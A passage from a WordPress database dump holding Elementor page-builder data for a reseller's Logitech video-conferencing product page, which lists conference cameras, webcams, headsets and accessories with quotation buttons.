id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1397\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Logitech SmartDock Flex<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1401\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 15m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1404\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 10m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p><img class=\\\"aligncenter wp-image-1406 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">MeetUp Expansion Mic<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5407,2922,'_elementor_version','0.4'),(5411,2923,'_wp_page_template','template-fullwidth.php'),(5412,2923,'_elementor_edit_mode','builder'),(5413,2923,'_elementor_template_type','post'),(5414,2923,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":-18},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b363b98\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35986ce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"64637ebe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"product-details-ctn\\\"><h2 style=\\\"text-align: center;\\\">\\u00a0<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">\\u00a0<\\/p><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1332 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech Brio<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"aligncenter wp-image-1334 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C9230e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1336 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C925e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p>\\u00a0<img class=\\\"wp-image-1354 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech B525<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table><\\/div><h2>\\u00a0<\\/h2><h2 style=\\\"text-align: center;\\\">HEADSETS<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p><p><img class=\\\"wp-image-1364 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech H570e Headset<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><h2 style=\\\"text-align: center;\\\">VIDEO COLLABORATION ACCESSORIES<\\/h2><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1386\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong><span class=\\\"product-name\\\">SmartDock Extender Box<\\/span><\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1391\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Screen Share<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1392\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Group Expansion Mics<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1397\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Logitech SmartDock Flex<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1401\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 15m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1404\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 10m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p><img class=\\\"aligncenter wp-image-1406 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">MeetUp Expansion Mic<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5415,2923,'_elementor_version','0.4'),(5700,2971,'_elementor_edit_mode','builder'),(5701,2971,'_elementor_template_type','post'),(5434,2927,'_wp_page_template','template-fullwidth.php'),(5435,2927,'_elementor_edit_mode','builder'),(5436,2927,'_elementor_template_type','post'),(5437,2927,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":-18},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and 